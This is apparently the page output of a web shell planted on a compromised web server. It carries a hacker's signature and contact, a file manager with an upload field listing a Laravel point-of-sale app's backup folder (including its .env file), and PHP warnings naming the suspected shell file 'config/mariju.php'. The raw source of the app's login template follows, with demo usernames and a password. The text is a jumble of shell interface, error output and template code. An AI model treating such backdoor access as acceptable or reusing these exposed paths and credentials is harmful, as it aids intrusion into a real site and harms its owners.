telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log15537647 KBJuly 18 2025 17:17:470644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
@extends('layouts.auth2') @section('title', __('lang_v1.login')) @inject('request', 'Illuminate\Http\Request') @section('content') @php $username = old('username'); $password = null; if (config('app.env') == 'demo') { $username = 'admin'; $password = '123456'; $demo_types = [ 'all_in_one' => 'admin', 'super_market' => 'admin', 'pharmacy' => 'admin-pharmacy', 'electronics' => 'admin-electronics', 'services' => 'admin-services', 'restaurant' => 'admin-restaurant', 'superadmin' => 'superadmin', 'woocommerce' => 'woocommerce_user', 'essentials' => 'admin-essentials', 'manufacturing' => 'manufacturer-demo', ]; if (!empty($_GET['demo_type']) && array_key_exists($_GET['demo_type'], $demo_types)) { $username = $demo_types[$_GET['demo_type']]; } } @endphp
@if (config('app.env') == 'demo') @component('components.widget', [ 'class' => 'box-primary', 'header' => '

Demo Shops
Demos are for example purpose only, this application can be used in many other similar businesses.

Click button to login that business

', ])
Premium optional modules:

Connector Module / API Documentation @endcomponent @endif

@lang('lang_v1.welcome_back')

@lang('lang_v1.login_to_your') {{ config('app.name', 'ultimatePOS') }}

{{ csrf_field() }}
@if ($errors->has('password')) {{ $errors->first('password') }} @endif
@if(config('constants.enable_recaptcha'))
@if ($errors->has('g-recaptcha-response')) {{ $errors->first('g-recaptcha-response') }} @endif
@endif
@if (!($request->segment(1) == 'business' && $request->segment(2) == 'register')) @if (config('constants.allow_registration')) {{ __('business.not_yet_registered') }} {{ __('business.register_now') }} @endif @endif
@stop @section('javascript') @endsection